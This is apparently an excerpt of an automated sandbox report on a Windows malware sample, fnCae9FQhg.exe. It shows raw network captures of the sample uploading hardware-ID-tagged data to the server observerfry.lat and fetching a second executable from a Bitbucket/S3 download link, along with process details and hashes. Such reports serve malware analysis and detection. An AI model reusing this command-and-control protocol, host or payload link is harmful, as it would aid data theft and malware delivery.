7CDF789295067FF1BEBA0C6A975F1733
--E8YHW9WJ7TL56BA
Content-Disposition: form-data; name="pid"

2
--E8YHW9WJ7TL56BA
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
-
2024-12-24 10:22:23 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=g3hf62f99mpp7vk5f08kv1a8q3; expires=Sat, 19 Apr 2025 04:09:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uMMXh82vUNJUOqC9VmzTcab9swpl2jr091DQ2Rgoda%2BezTX1y6ymGlRj5H3yK1HhyJ8NcgFaklMGb1DY71ZsZFTPSCL7dA9mbLYQxkprv2vX6oIT8RYcsJrSqghb4UX4ZI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdeb32fe8437e-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1589&rtt_var=598&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16029&delivery_rate=1837633&cwnd=236&unsent_bytes=0&cid=cc78339b8d3a947d&ts=907&x=0"
2024-12-24 10:22:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 10:22:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49739 | 104.21.36.201 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:22:25 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=481B5SIFX1Y4XKA
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 19951
                                                                                                                                                              Host: observerfry.lat
2024-12-24 10:22:25 UTC | 15331 | OUT | Data Ascii:
--481B5SIFX1Y4XKA
Content-Disposition: form-data; name="hwid"

7CDF789295067FF1BEBA0C6A975F1733
--481B5SIFX1Y4XKA
Content-Disposition: form-data; name="pid"

3
--481B5SIFX1Y4XKA
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
-
2024-12-24 10:22:25 UTC | 4620 | OUT | Data Raw: [binary data]
2024-12-24 10:22:26 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:26 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=6bbg5opcoe6av7s6uegh7m9f1j; expires=Sat, 19 Apr 2025 04:09:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iFSFuPYkXNey4Rh1Rv79si2hsEtK1jH4e3rdYoXYrySWpW%2F7bpfhGoMWwYKVkQOlS%2FV4%2FGaVGNP94JSA71gPV4suj7QL9LXlXBZernyCLco%2FBkzcPOdQZr3NoQB5jQmwRQg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdec43fa9c472-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1620&rtt_var=623&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20909&delivery_rate=1732937&cwnd=234&unsent_bytes=0&cid=4d3d93c5f455afd5&ts=937&x=0"
2024-12-24 10:22:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 10:22:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49745 | 104.21.36.201 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:22:28 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=UNL82YRDMF7E0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 1206
                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                              2024-12-24 10:22:28 UTC1206OUTData Raw: 2d 2d 55 4e 4c 38 32 59 52 44 4d 46 37 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 44 46 37 38 39 32 39 35 30 36 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 55 4e 4c 38 32 59 52 44 4d 46 37 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 4e 4c 38 32 59 52 44 4d 46 37 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 55 4e 4c 38 32
                                                                                                                                                              Data Ascii: --UNL82YRDMF7E0Content-Disposition: form-data; name="hwid"7CDF789295067FF1BEBA0C6A975F1733--UNL82YRDMF7E0Content-Disposition: form-data; name="pid"1--UNL82YRDMF7E0Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--UNL82
2024-12-24 10:22:29 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=5ochdrnbs0c0v15mfs7r5ugv4l; expires=Sat, 19 Apr 2025 04:09:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vFWgIjQ9l0szfiBfu6fKaErgUvtI1DZ90Sg7bU0w4jUaKDScEPN%2BkOchDYxRv%2Bh4STOgJ%2F%2FPyc5zY0KP1%2Bekh7cpF3DC5RBcIxKW6fNceCG4JQiFptHMs4gJc4UM2RRmnPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fded71bf34261-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1663&rtt_var=642&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2117&delivery_rate=1682027&cwnd=239&unsent_bytes=0&cid=ac921c05bc7e9c16&ts=778&x=0"
2024-12-24 10:22:29 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 10:22:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49752 | 104.21.36.201 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:22:31 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=JZV35BLGTBG5B66
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 572528
                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: 2d 2d 4a 5a 56 33 35 42 4c 47 54 42 47 35 42 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 44 46 37 38 39 32 39 35 30 36 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4a 5a 56 33 35 42 4c 47 54 42 47 35 42 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 5a 56 33 35 42 4c 47 54 42 47 35 42 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                              Data Ascii: --JZV35BLGTBG5B66Content-Disposition: form-data; name="hwid"7CDF789295067FF1BEBA0C6A975F1733--JZV35BLGTBG5B66Content-Disposition: form-data; name="pid"1--JZV35BLGTBG5B66Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-12-24 10:22:34 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:34 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=gej2odqmu8ctqvrmb32b14k923; expires=Sat, 19 Apr 2025 04:09:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gO%2FUAGkOk0wlUQ83QiQnmDVzRDnx1Djflqmr0Hcg6TSuSPcGXFQaGdJD05ld0a4LTYxXP9jNYGHKR3pP512TUhR3AvoZl6eXgDuj7nOSq%2BPXx1ky4UFf6Wve03KL%2BqZJDc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdee5ffda42eb-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2127&min_rtt=2115&rtt_var=818&sent=326&recv=596&lost=0&retrans=0&sent_bytes=2835&recv_bytes=575071&delivery_rate=1318284&cwnd=211&unsent_bytes=0&cid=f684dea84944fbbd&ts=3716&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49766 | 104.21.36.201 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:22:36 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 88
                                                                                                                                                              Host: observerfry.lat
2024-12-24 10:22:36 UTC | 88 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 37 43 44 46 37 38 39 32 39 35 30 36 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=7CDF789295067FF1BEBA0C6A975F1733
2024-12-24 10:22:36 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:36 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=qsi5s1ppovla415tg8dk92vth0; expires=Sat, 19 Apr 2025 04:09:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EMLh7r0Q56xyW9xqJipzC0bYmzMsPuvpUCSWhZIw4y9ZXY2cAFrDl6n3M%2FUzo9aqMJIq1YgkRCGbACD9ZmBpybL6CLMdyzDOiegJNOjfQAc%2Bfik7HUQiZ401M8BM7BWHztM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdf05a8e08c15-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1956&rtt_var=747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=987&delivery_rate=1452013&cwnd=238&unsent_bytes=0&cid=0c4746635c708058&ts=641&x=0"


                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                              8 | 192.168.2.6 | 49773 | 185.166.143.48 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                              2024-12-24 10:22:38 UTC | 248 | OUT | GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Host: bitbucket.org
                                                                                                                                                              2024-12-24 10:22:39 UTC | 5944 | IN | HTTP/1.1 302 Found
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:39 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Server: AtlassianEdge
                                                                                                                                                              Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J [TRUNCATED]
                                                                                                                                                              Expires: Tue, 24 Dec 2024 10:22:39 GMT
                                                                                                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                              X-Used-Mesh: False
                                                                                                                                                              Vary: Accept-Language, Origin
                                                                                                                                                              Content-Language: en
                                                                                                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                              X-Dc-Location: Micros-3
                                                                                                                                                              X-Served-By: 3f9eeb81cb81
                                                                                                                                                              X-Version: c9b3998323c0
                                                                                                                                                              X-Static-Version: c9b3998323c0
                                                                                                                                                              X-Request-Count: 1605
                                                                                                                                                              X-Render-Time: 0.03938484191894531
                                                                                                                                                              X-B3-Traceid: cd09ef5613124c01a4835b8e6982337e
                                                                                                                                                              X-B3-Spanid: da744623b84969fe
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              Content-Security-Policy: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpuser.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.p [TRUNCATED]
                                                                                                                                                              X-Usage-Quota-Remaining: 999173.500
                                                                                                                                                              X-Usage-Request-Cost: 837.73
                                                                                                                                                              X-Usage-User-Time: 0.025132
                                                                                                                                                              X-Usage-System-Time: 0.000000
                                                                                                                                                              X-Usage-Input-Ops: 0
                                                                                                                                                              X-Usage-Output-Ops: 0
                                                                                                                                                              Age: 0
                                                                                                                                                              X-Cache: MISS
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                              Atl-Traceid: cd09ef5613124c01a4835b8e6982337e
                                                                                                                                                              Atl-Request-Id: cd09ef56-1312-4c01-a483-5b8e6982337e
                                                                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                              Server-Timing: atl-edge;dur=148,atl-edge-internal;dur=5,atl-edge-upstream;dur=146,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                              Connection: close


                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                              9 | 192.168.2.6 | 49784 | 16.182.108.137 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                              2024-12-24 10:22:41 UTC | 1352 | OUT | GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J2I4rdz2f%2FJD7Dq%2BF00i4OW%2FxQJ6LqwaPMAIX%2 [TRUNCATED]
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                              2024-12-24 10:22:41 UTC | 554 | IN | HTTP/1.1 200 OK
                                                                                                                                                              x-amz-id-2: oSRhGp/z+ioKo8TcXnJxuktNTn/UXCO/CiUlIMFYPft5JjeMc3TpcM6IIDLsOIWufHe/m5E8CRQ=
                                                                                                                                                              x-amz-request-id: K6QAJ3GF39PVY27X
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:42 GMT
                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                              ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                              x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                              Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                              Content-Length: 1325507
                                                                                                                                                              Server: AmazonS3
                                                                                                                                                              Connection: close



Target ID: 1
Start time: 05:22:10
Start date: 24/12/2024
Path: C:\Users\user\Desktop\fnCae9FQhg.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\fnCae9FQhg.exe"
Imagebase: 0x9c0000
File size: 2'960'384 bytes
MD5 hash: F52F8EC2CDDC2977F7F74FCFDF87D35F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 6
Start time: 05:22:43
Start date: 24/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 2028
Imagebase: 0x250000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 9.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 67%
Total number of Nodes: 476
Total number of Limit Nodes: 44
Strings
Memory Dump Source
• Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
